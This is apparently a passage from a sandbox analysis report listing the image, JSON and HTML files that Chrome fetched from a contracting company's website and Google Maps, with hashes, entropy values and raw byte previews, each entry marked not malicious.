                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):5774
                                              Entropy (8bit):7.387975124118672
                                              Encrypted:false
                                              SSDEEP:96:RNBf33Pf3ff33Pf3dkWCfbK32/Gq0nBQt1nUeFd8XJ0LYC96+9hH3FLbuvHl+Z7:rBnnn6fWmKnuZFe5iv9/H30vwp
                                              MD5:4F658B9A7D067DE5238644B78D8D09CC
                                              SHA1:A669BB818ABF638D4B14347BAF79D8C45D671CFE
                                              SHA-256:B9874A9D2687074F9C22A8D2276339B90388C8DFCACD5A4F1F87A563FCBFC8ED
                                              SHA-512:7E3FB810A90D38134E783246347352EA5FE3E47FB3798872610F86B1E0751B7D69562B4DF9F3DD1B5256C32FCE06531D61B017D5FC917136DEA17C591103755C
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR..............$.....sBIT.....O.....pHYs..7/..7/.6u......tEXtSoftware.www.inkscape.org..<.....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................#......tRNS................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                              Category:downloaded
                                              Size (bytes):47505
                                              Entropy (8bit):7.976417758817314
                                              Encrypted:false
                                              SSDEEP:768:aln4bvD2uAUzz/oDAK0V+GJMWMJT+cxFwc3wA9FBYw90uBXozqCd/vt47a+ZA29m:aVkvD2u9/oAJMWc+c2c3FCwiuBYf1vUO
                                              MD5:1CD9E5CE609D09DF75282F2F1B60B131
                                              SHA1:CCD79C99A982F2BBE33F708333E15759E58E3077
                                              SHA-256:43011B21219DD5A46A340DD9189083D2B483C5C44D007847259B94ECFA355682
                                              SHA-512:FB3CD6CBC1DEABB9089BE0CB4DB5E00CBA30CEAAD32B008450F4BC07C98CA57F967A54E56352CA6C58314B271EB08CD4274860C419606B2DAA6950E4C3C8024D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA6Tobub5P_1DSWkbyoqwTIdoYcHxHc3hU1RgDt9zmlJhA26OfMLmlBm2Bpo0Z1vb1zRt7gVcjl49Xc_8r1BmnMuhM2CvUmuS9DrPdBSuK5ed67e-F4_taLBnN48LcLXZHIb8mDXDHohSf2jtymIQBdc6XNv0be-uqWei-icZ-GS3nlXuLf5Y12YlYL5bL9j2WKLc2wi&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd
                                              Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................,.,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..<g..m.Z..M5.b=3B..m5<Ioi%.....Zi.\...+F.+).]x..s..G.T.Zxv..RP.]...Eqj.B...U...!..V...mx[N.lu.C[o......H.E.3..[/..H.*....{........i.&..l5.3V....R9.D..h.U^{....$.Ad.br......$.......Q.......n.u.z.Z%...x....+.k.p..|../.......n.........m..iQ.:..L.."]...WV.Lq.X....A.[..K(<E5.jzm..k..?;.;TS,r,K+.V.Lj.1.I2...<F........^.w2\..W3.LS.[@R........%..!...9...D`....s..4
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):13140
                                              Entropy (8bit):7.618572856945904
                                              Encrypted:false
                                              SSDEEP:384:4YNg7hKFFTBd+aj8QmfX8VFg4E58lCH8Mc:4YyYH9Xj8QmfX8VFg4E58R
                                              MD5:738FC79940F017D74E17A85BF41A18A3
                                              SHA1:8DD9A623923FF4BCF0A4E356309E2532F4ECB259
                                              SHA-256:3EB4334B9A60E2A6A3EFAA6FF6BC3390148392D73BD01C4AF5944E7C1B156108
                                              SHA-512:EC891652F7D78BB0C18178EA066239A214AD431F4250E5A7FE08855F62DD32C8E1066C2FDC4DFF084F8744F200EDA01F1A39D725D9C6B8FB0993051103B2AF9A
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:dropped
                                              Size (bytes):85004
                                              Entropy (8bit):7.978936142850846
                                              Encrypted:false
                                              SSDEEP:1536:6T2/tWbN/MutnXPRu6SkLeYiGSsn0V117mKzzH/JoZCzvUI:LWZUu7u6SkKjR7mKPqYLUI
                                              MD5:5C1DF59C53CBA303FBC334EDAE550B85
                                              SHA1:66599E939F4FCB5C439540B62A4E217899C9D9AB
                                              SHA-256:DE145B9451BAD0A05699270211FB25D1E3BAF25A754F27053570E81D9B7DDE39
                                              SHA-512:62DB87D1C3FB201639045D90F006E5F05B2317EA734ABEC0E6EDDFCCE6107D986BA8E48319F7CD6D25797A90B7C3F13EA307D685D43C24D664B0AAD77CA44571
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:DD587B73934111ED9088BC1E9C9B17A2" xmpMM:DocumentID="xmp.did:DD587B74934111ED9088BC1E9C9B17A2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DD587B71934111ED9088BC1E9C9B17A2" stRef:documentID="xmp.did:DD587B72934111ED9088BC1E9C9B17A2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............1...z]..L...........................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JSON data
                                              Category:downloaded
                                              Size (bytes):4113
                                              Entropy (8bit):5.075860992877331
                                              Encrypted:false
                                              SSDEEP:48:ccR50vARZ3im8MWl7NNVAS1m+q20NDFHSqqY+CJqwyLNXX:EySm8PN77gDFx+CJRCNH
                                              MD5:33124730D578A560BC14DB423F651909
                                              SHA1:6F68086460D5C8796F0583537A77E41A1A37B004
                                              SHA-256:BD5A07A339BBB0C59C18BDACC448A133AE6BD92A381B2A25C94C8BFA7BD68001
                                              SHA-512:EEEA199998D9F8E4C8E3448E8718E3BE26653421F7E12CC31C3B82186EE3848AAB5B4894E3FEE0B3C5300FE4C5528D6794AA9406D4419B8E27E81D056E7F8C99
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m4!1m3!1i15!2i21415!3i14013!1m4!1m3!1i15!2i21414!3i14014!1m4!1m3!1i15!2i21415!3i14014!2m3!1e0!2sm!3i707457653!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e3!12m1!5b1!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=3619
                                              Preview:[{"id":"vuwtuwvwtwuuwvw","zrange":[15,15],"layer":"spotlit"},{"id":"vuwtuwvwtwuuwvw","base":[1403470848,918354944],"zrange":[15,15],"layer":"m@707457653","features":[{"id":"4502866564103614152","a":[0,0],"bb":[-14,-7,15,8,-9,4,9,19,-15,15,15,30,-11,26,12,41],"c":"{\"1\":{\"title\":\"......... ...... ......... .....\"}}"},{"id":"2775180758760152124","a":[29440,512,1403500288,918355456,1403500288,918355456],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2],"c":"{\"1\":{\"title\":\"........\"}}","io":[0,-13]},{"id":"10574375220758496514","a":[2304,26112,1403473152,918381056,1403473152,918381056],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2,-118,-27,-10,-9,-88,-13,-10,2],"c":"{\"1\":{\"title\":\"..... .......\"}}","io":[0,-13]},{"id":"9052388106036731616","a":[23296,9984,1403494144,918364928,1403494144,918364928],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2],"c":"{\"1\":{\"title\":\"....... ... .......\"}}","io":[0,-13]},{"id":"
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):13896
                                              Entropy (8bit):7.981316345911421
                                              Encrypted:false
                                              SSDEEP:384:06sbcUpwB3jHm5R/cOURbUgGntRmqiusv:Eu3jHYde7oRnk
                                              MD5:44CCBD51C611071BE4E1C5A10A10F2D3
                                              SHA1:280F22FC1CDF80E17A0711A39C7428BD06C93906
                                              SHA-256:C2918CD7EFEA464A642AA0238F3D71CD65EA02B75ACAE94D6A8C2AA128C30ABB
                                              SHA-512:76B13DD5DFFE89FD4381849ACFEDFE13063822CAD54BB46A2A980A66B8199EDFC96F0E83C218473E9075BA1BAE8AA0A08435DCA5FD50CA1277919DB004206E74
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21412!3i14012!4i256!2m3!1e0!2sm!3i707457593!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=87022
                                              Preview:RIFF@6..WEBPVP8L36../..?... ..&....B."Q.;.'..p[....K.....2.......d+....C..!.w}z.............T...(d .dH..I.K. .A..Q..`.J#(D_..j.,......vJ....p1..{3..9.v......S1X..I..7.o]Z..f.[....1E..FY....5.:g..Z.....5.dk.!.$........._.r..2...1.R.........m.m.C.N..x.\\....]..........\.u...J.9'(s.}.}.CI...J........?...R;.u6""...d..2.\./.{W..........GH....d/.d..+..?.....+St#....._...~..h.\.(......./....:[.p..q.*.d......CY..#+.E..K0H.\....V.f.zA..8.g......*O.....W.!..Q/%.6.2w...^NuY.Rc..+..2Aru..Z.#.+k.>.w.{.*.ne.......1Cq....9\U._....p..\.3.........e...IE...../.........xo...pp.2..e.oX..UK.c.[..U........Y......U.#Q...\g...IY..;...F....l..C..g.....#.&..!3\-.}....b0R.8.....-.j..*.Arq..,..!..5.r..8T_..Ne..%m.*_.._.Q...0.M".2.U...^qf#+N...l...9[.;!..z'7.ul..rc..H.Df.#..v.:i-.f6..K..g^.....Yu..^9p..4..Y...v.....R..B.jIv.>..c<G.|.u..%.............w97....Cp.D..&x.$."../.z.....pOr...F..7.6.n%F..5L..`4d....5.+LU..m..Y;...r....\...=*BC...wp..V.S...0....m.1....6v6.9T.j
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:dropped
                                              Size (bytes):85779
                                              Entropy (8bit):7.987113880360917
                                              Encrypted:false
                                              SSDEEP:1536:TBnHX4liBf1D7LoNvzcVgUXXyYt1cPPcRyThSvqKlOLR:TBHX4ly1fLo14K/6uSCKAR
                                              MD5:DF867CDD9CE765B8379AC145BB7947BC
                                              SHA1:BE0009217C871A788A5639FF0BFD85B5EC23E59D
                                              SHA-256:EF6553EAE2FE07B1586333C8B8409FF8F35F46A251245E1D5F098FCC59C00CD9
                                              SHA-512:91A0184AB8DE50171E9412704C86B6CBA089DE6D838D827096A418122379827F4397014127B4FA44A0034D066E6C36983DFB9A9FAD7D0FCC72AEAA48B00CAF40
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."................................................Y....7Y....T...N.......}V.a}s........|...76.z,T..;+...h.m..$....".n.^-u$........"3&0.g,..\../....?s.....G3..>'.......8......1.NP)..b......*.w4..(.&......H51...*Ql.Z..#.g...m8DDF<..g....u|......z/....T.T=.N....c....7c.fW.M.j3.V.m........\.U.L..UK.nUIWSnJ..].....l"8T7..m9..O.Q..._.x..g.y.G.....g3...91...@..["H...vzW....\.7..%U...L.U*.....G.a.......P...nG.gCv......z|..#.....<.<....+..H.....p.v..EW.....Uc..$.....W%J.5.4....p.....>r....y....=.;G...v....;..e[.Y.BJ.Ey4..*"..-.}....\..C.\..O6.RIU%jZtO........L.5..........`.T.U..p{............".X..%m..^....H..UUPR......rJ...5.A}B.vFd.C.........F.W...b.h..x.k. <.N....U..0t..9*\...RK..cN...6..\.c....Uu ...?..#8d.3.>?......s:..W...P.U..|W....:...wHu..s-...l.Rgi]K...C..H..$.P..r.I#..l...2#+
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):19735
                                              Entropy (8bit):7.7739521697401965
                                              Encrypted:false
                                              SSDEEP:384:HdAe/8EYhDj9hpswD3gg8gnL+lm6I1oyJc3BOsgom2bLgMwjAX7HN:HhoCM3dnL+gv1oyC3csgXtijN
                                              MD5:2B52629F09A3CE0A914769B1189D0CA6
                                              SHA1:2652F87377EBCDB23D7781A1F26F269E5E8632E4
                                              SHA-256:FD5F5697BE99E813C5114BDAA83BAA97527DC952A412A1F3271B1D7F66DE130C
                                              SHA-512:3E9A41A13CB0D982EDA96F7B10509759EBD0D487B2545FBD53E1E6D8B51F3DACF552690C55B1B9AFF8219DB0BF63BB175E95388C6978A4DC88D7AC43DA07B79E
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:1055E192925F11ED8BCBBDE1C3CD0FA7" xmpMM:DocumentID="xmp.did:1055E193925F11ED8BCBBDE1C3CD0FA7"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1055E190925F11ED8BCBBDE1C3CD0FA7" stRef:documentID="xmp.did:1055E191925F11ED8BCBBDE1C3CD0FA7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d................i..-...<...M.................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):9514
                                              Entropy (8bit):7.407492448943884
                                              Encrypted:false
                                              SSDEEP:96:pN26MT0D5MdtbZPAVwzVdz8PJ4Sf8tousplQvlCob9t9AIetlRorWyadTJOhpb:4YNMtKwEyozlylDzmtUCwPb
                                              MD5:229C37389E0E8EBF52EFFF5FD5AF2F4B
                                              SHA1:07D3B0D68DBAD5536251266DC26CA8F4173C93A0
                                              SHA-256:B529F1C84C2159CE9329785267C372B5802736AA0E4C5A85CCD1406565FBF96E
                                              SHA-512:2915CB1DB6BD408EAFCAB8BAE500E2033419A65D4F6807A96CC99D86D2DB6D656F11D8B6C341131C84691CAC23B3E67CE9F3851308CB8EAC7E219E245821230E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/54/18ec312e55545a7a9fa198129a873cf2.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):2336
                                              Entropy (8bit):7.883320764049964
                                              Encrypted:false
                                              SSDEEP:48:z3GJ7CEu+oX+FGfWxDCFEpl/BbfGMLEEhNs2fSk5Ov7iY7Nyxn/96:zK7CE8tWbpVFOKmkSM6b7G/96
                                              MD5:9C5378579D5567C82B8C747BD0C3DBBF
                                              SHA1:2E7A1B710D00DE191FE3DF75F3DF126EDA5C612F
                                              SHA-256:88E9C0D3DD54E1EC4AF789449AC85EFBC0B18469689B62D54BECDC64DBD47760
                                              SHA-512:FC88AA50A1419500E8178E1D26AF661DB36DB6418BFA3AC2579B4718862FC50A29C0357E61A0F098A79928970B6D27B490B818DED3F5F9EBAD7CC5FA8984D23F
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...QPLTE........................................................}.......32.KI.......jd.&!?..C....IDATh.Z...0.$!..I .........uAqz\.[....U... .,.sk...Y.t.\...E.....nm........Ep. ..:.>.+..m..'....p.%.....e.W0]i]}l...e......"eV..M..g...(.W.WMi-...B.p.m.>*..S.....Ss..)c....^.n`t......60..K..R.ZJ..\.\,!....9.......%...ot{Z9o..C...$.....T.(....1./..`.z.su...Mk.|.;Ai...ST.. .@x.i...gu...A.....*....6.;.u&.g.c.Mn.{..2... Y.....y..}..c.d..J&.....Qt.q...E....dT..T..kJ.d........:d}WIw.......L......2....N...Oa...'.c.rA...f.._.C ...t.m....h..x....L.Dy].B_....C.....!....<.f.|zC%....C Y..r?.x..~./.KO.q............q(...w......J.e.).....JP..I)a..6../v@....W..b..D61....... .$....M.^k{...Aj...@Rv...Q..0A.I.D..[.<......!&..t...E{.E.;p%....J{6Ny I..$.F/..]...I.oA,"...w.H/..}.D...TS.@G?.D."zY..9..m.+..I.s>....>..k.G.45Iv......>..m9:.@....D......I.....).....E."..'..<PF..F.cR1.... ...{..0A.Q3.C<......3....Yt-..nG.M5k....J..X;.(.@.....I2..V
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):5716
                                              Entropy (8bit):7.95089745463362
                                              Encrypted:false
                                              SSDEEP:96:DhPXmw/KVHr57oaRC2+6ywmmZ/SExTuhgnWdnmomFL0QVTN+DStp0QcT8CJHCELU:DZXRSVH5E2+gmhQQp2FL0Q0DvQc/wELU
                                              MD5:FA2B94A1CD2FEA2DDE94A8E2D1D312DB
                                              SHA1:55FA7F72FC0A67BA2EEAE6574D36FA35F53B1523
                                              SHA-256:C3C3693B997A09947822F15AB5A0C013D04F80A62D9D9015AD50D6B7D8F69202
                                              SHA-512:032D38E67C3C9E05A2892849C5109FBC5DE3074148B0EEC7B555F194CDBD4A70FC3594D76AB82EF22A1C0D9D98AD7E98A6F406F36AE6D133D9F075F9BD2F67E4
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/school.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...aPLTE.......M......M........P..P....L.xW\[Rh................~\_...L..i9.....SOl.U`.^]...........YX...P.s_e.dWm]Z.T...f\.....tgzSg...fb..{]g...QLc....lYc..ha........I..ei...pQP..nR\.^f.......TP.`VzSP.Yh....[...`^........S].K..........G.......Q...l....ul..hi...n^ocz..hU.N%.........W!......zu...hP..!RDU.....ghs...oz..........|MZ...zl.S........|.NJ.iZlu.a..b.......t`y.]S....T".^O_.Q!.F..Ys_Ur[...=.l............og..k........x....aU..^...@#.: .NP......S........YT.jw...c5.pd.AG...M0.g]L....k...z...[q.[`...D..>...jG...tB...yP.....U...V/.....F.....9F......1w....IDATh.X.O.y..0......#.v..3...7..Se{p...T(E.f.`. ............m...]...kl.&..m...W.;.x..e{.g......y..y..i.L.. .$8...!.~...L....@e...A#h..'ICB&\..........$.2..=h......0..H~[Z....!*..@.O=I.?...d"AV.q.1..Frg||.A...U..\.8.....$..ol..T..1...H..$....T.7&BE.^E}$}4$X.Taw.Di.HH..._G|.4q.$.v...%..D^!y..|....iN.VI...}4$.../..\.9..6"....wu....[
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 99, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2642
                                              Entropy (8bit):7.89260383627698
                                              Encrypted:false
                                              SSDEEP:48:IfFc/yRv5d4mWygH9Uh/OTphwfy0RHcC0cBXnY492KVL3D4HYo823L:Ut52mM9Uh/OTpUxoe92ILzHoL7
                                              MD5:45A15F5355B666FFB018D04D294F2EEE
                                              SHA1:AF8D0BAE7BC32B15AF14A93C96C8D33F8EE71F7C
                                              SHA-256:0EFEEFD315E83FE2EEA0C6DD8F9DB95D4808CC24756E71C7B9169A7B15B174DE
                                              SHA-512:7666D3077D856EC76C7D4307DAF18798C15BEE25B68EA6D504A4CC91BD69CA127587B883F9E562DAB23F1B2BC37E09F03049E8228FA7BF0B48C4B3139B07158F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/tomsher.png
                                              Preview:.PNG........IHDR...d...c.....Z9U....WPLTE.=..9..5~.4u.7...........@..<..B..B......./b.Gh..*h..........G.k.........6X....Rw..N.>x.7....IDATh.Z.r.0....an...=.....F..l9...=#.l.4.c...?y.k.c...[...{.EQtc_Gc...tf..'..~....4..1..te++).c..~.)...5...N....,..,K....V)..R.Z..r.[.d..h.A..... FnL....c.`9W..(|..._. e[.M...M..d..6.\VI9.zk-..<sB...A..........$...R......P.c.z.."4.......h...$...8BO<(Kot.....R.......Z.y..a(..&<v.{.....v .$.#.y/.=.\.Uy1.ku..`"9UVw......dV..7.%... .k!.P.e.,{s9.......:.a....5.f.1.. . .........<......wA..]....#.evAbr.,........D.r...W....f..V...o.X.....j..g6.a.N.pU... .e). .L....H.Uw..{..0.E(......Z?..].p.2J.k,"N..[&...C....=..m..=...{n3E.@.....@..5]%.8." PrT/vA(e...Yr.v....%...S.....$XA..].QE..$.]Zy.'..{..c [z.6J...w.5r.I...E.S!~.p.%X.-9r.....I.....2dU.`......U]c.{..G.@Y.._fZ.T..)...Q....(..)..]...M.B.T3..&.Q.k.3MI.g...-Q.c...v.I.. .*.$N....p......O...#.e8.".&;#...U...1..tB.F... ...'Q.@ .\. N^.]g..........b..i.05.....Q^\.MH.K..WBh..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x480, components 3
                                              Category:downloaded
                                              Size (bytes):54674
                                              Entropy (8bit):7.9666689215115065
                                              Encrypted:false
                                              SSDEEP:1536:eXc1jlalEIf6diHeaZwKQRxi1gHZn2FSyDKltvTffffffffffffffffffffffffZ:eX2LNiHeaZMRx8g8oyDwTffffffffff5
                                              MD5:D9009CF8DB0331C76B1B53BB58A3C2F1
                                              SHA1:BE6A100DE33B2207EEB7B0299C899E9E047CFB7B
                                              SHA-256:4794E7ED96BE3356744A14345EC414B8D4833537113B473EE284D94785DA9338
                                              SHA-512:028D6F05FA4398CF899CD62347C5D8EE28073A9E309A70DE4531C218000BF84A8AC1CD06F8B4A28A9662AFC635460A1E82CBCC8B036581E34BBA1BD0255339B3
                                              Malicious:false
                                              Reputation:low
                                              URL:https://i.ytimg.com/vi/-PcNMUQloeU/sddefault.jpg
                                              Preview:......JFIF..........................................................................................................................................................."........................................._........................!.1A.."Q.2aq..#BR...3Sr....$Tb..........CUs......%4Dc....&t.6du...5..................................?........................!1AQa..q..".......2R.#B...Sbr...4...3............?..)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.J
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2579)
                                              Category:downloaded
                                              Size (bytes):3600
                                              Entropy (8bit):5.554707588813243
                                              Encrypted:false
                                              SSDEEP:96:yMDJXoBClvHYrgpGND73tpSP9NywJlvL6X:ygJ4BLSKD7ELO
                                              MD5:24FEB14BFFE0FF2A852081F4FDE9390F
                                              SHA1:79B3A08ADCD0EFED7E535661F5E27D39A2079147
                                              SHA-256:D474B655255C274A759CED2DBC40CA7223986D46CA860DA2127D50A52EE1974E
                                              SHA-512:6BF179E42EA344515547D2E0643670B133557B97E2985D011C06203FE9FC0327985A6F6DE5873F9F8EF3C38A39E5DCB44836FA56FBA0D50AF644B3899F85158D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d7220.8946438946405!2d55.258405!3d25.188133!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0x50df22dfd0d09b8f!2sCity%20Diamond%20Contracting%20LLC!5e0!3m2!1sen!2sus!4v1663058383351!5m2!1sen!2sus
                                              Preview:<!DOCTYPE html>.<html>. <head>. <style type="text/css">. html, body, #mapDiv {. height: 100%;. margin: 0;. padding: 0;. }. </style>. </head>. <body>. <div id="mapDiv"></div>. . <script nonce="fT4XLMtxx1UU-SwfqYrgYQ">. function onEmbedLoad() {. initEmbed([null,null,null,null,null,[[[2,"spotlit",null,null,null,null,null,[null,null,null,null,null,null,null,null,null,null,11,null,[null,null,null,null,null,null,null,null,null,null,null,null,null,1]]]],null,null,[[null,null,null,null,null,null,null,null,null,null,null,null,null,[[["4494427010317758935","5827414787517094799"],"/g/11bbth6f7x",null,[251881333,552584050],null,null,null,null,null,null,null,null,null,null,"gcid:general_contractor"],0,0,null,null,0,null,0]]]],null,["en","us"],[null,null,null,"/maps/api/js/ApplicationService.GetEntityDetails","/maps/embed/upgrade204",null,"/maps/embed/record204"],null,null,null,null,null,null,null,null,"_072ZtmxF920i-gPv7iEqAk",null,null
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):14590
                                              Entropy (8bit):7.686980152511969
                                              Encrypted:false
                                              SSDEEP:384:4YNg7wNkFzEYb2KG86C48z9VH4+rqCuc/:4Yy8NYKCVHtxuc/
                                              MD5:BD8D46206A8C844E51290370A7494BD7
                                              SHA1:E045D32ACE1A91964F25EB0CB48EFC637253EA4D
